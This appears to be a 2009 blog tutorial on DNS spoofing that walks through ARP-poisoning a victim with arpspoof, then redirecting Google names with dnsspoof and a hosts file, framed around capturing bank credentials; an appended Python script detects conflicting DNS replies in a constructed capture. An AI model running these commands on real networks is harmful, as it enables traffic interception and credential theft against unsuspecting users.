Wednesday, November 25, 2009

DNS spoofing (dnsspoof)

When a web browser requests a page such as 'www.google.com', it sends a DNS request to a DNS server to resolve the DNS name, i.e. 'www.google.com', to its associated IP address. DNS poisoning comes into play here: once that request has been sent, the web browser is waiting for the DNS server's reply/answer to the DNS query. An attacker who can see the request going out can in turn send their own DNS reply/answer before the DNS server does. It is a race against time, and if the attacker is on the same subnet or network (one or a few hops away) as the system issuing the request, the attacker's response will usually reach its intended destination before any outside reply does. The danger in this attack is when the attacker spoofs important websites such as your bank's website. His/her fake web server will have exactly the same interface as the real bank website, so the attacker can wait for you to enter your credentials on that site and capture them.

victim: 10.0.0.2
router: 10.0.0.1

Tools:
dnsspoof
** (ettercap can also be used for this)

Dnsspoof:
First you need to create what is called a hosts file. In your text editor type the following:
127.0.0.1 www.google.com
127.0.0.1 *.google.com
127.0.0.1 www.google.*

Save this file as 'hosts.txt'.
Perform a MITM (man-in-the-middle) attack:
# arpspoof -i eth0 -t 10.0.0.2 10.0.0.1
# arpspoof -i eth0 -t 10.0.0.1 10.0.0.2

Start spoofing with these commands:
# dnsspoof -i eth0 -f hosts.txt

Or, if you are sniffing an entire network rather than just the traffic between the gateway and one host, you can add a tcpdump filter expression at the end:
# dnsspoof -i eth0 -f hosts.txt host 10.0.0.2
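The race described at the top of this post leaves a footprint on the victim's side of the wire: the client sees two replies for the same transaction ID and name, one forged and one from the real resolver, carrying different answers. The script below is an added example (not from the original post, and not part of dnsspoof or ettercap) that parses minimal DNS responses (A records only; it assumes the IP/UDP headers have already been stripped) and flags such conflicting replies over a constructed capture.

```python
import struct
from collections import defaultdict

def _read_name(data, off):
    """Read an uncompressed DNS name at off; return (name, offset after it)."""
    labels = []
    while data[off]:
        n = data[off]
        labels.append(data[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1

def parse_dns_response(data):
    """Return (txid, qname, [A-record IPs]) from a raw DNS response payload."""
    txid, _flags, _qd, an = struct.unpack("!HHHH", data[:8])
    qname, off = _read_name(data, 12)
    off += 4                                   # skip qtype and qclass
    ips = []
    for _ in range(an):
        if (data[off] & 0xC0) == 0xC0:         # compressed name pointer (2 bytes)
            off += 2
        else:
            off = _read_name(data, off)[1]
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:          # A record
            ips.append(".".join(str(b) for b in data[off:off + 4]))
        off += rdlen
    return txid, qname, ips

def build_a_response(txid, qname, ip):
    """Constructed sample packet: minimal response with one A record."""
    q = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(int(x) for x in ip.split("."))
    return hdr + q + struct.pack("!HH", 1, 1) + rr

def find_conflicting_replies(replies):
    """Flag (txid, qname) pairs answered more than once with different A records."""
    seen = defaultdict(list)
    for src, raw in replies:                   # replies: list of (src_ip, payload)
        txid, qname, ips = parse_dns_response(raw)
        seen[(txid, qname)].append((src, tuple(ips)))
    return {k: v for k, v in seen.items() if len({ips for _, ips in v}) > 1}

# Constructed capture: an on-path host (10.0.0.9) answers txid 0x1234 before the
# real resolver (10.0.0.1) does, pointing www.example.com at a different address.
SAMPLE_CAPTURE = [
    ("10.0.0.9", build_a_response(0x1234, "www.example.com", "127.0.0.1")),
    ("10.0.0.1", build_a_response(0x1234, "www.example.com", "192.0.2.10")),
    ("10.0.0.1", build_a_response(0x1235, "mail.example.com", "192.0.2.11")),
]
```

Running `find_conflicting_replies(SAMPLE_CAPTURE)` returns only the www.example.com transaction, with both sources and their differing answers, which is the signal an IDS rule or a resolver-side monitor would alert on.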

Resources/Good reading:
http://www.securesphere.net/download/papers/dnsspoof.htm
http://wcosughacking.blogspot.com/2008/07/dns-spoof.html
https://calomel.org/dns_spoof.html
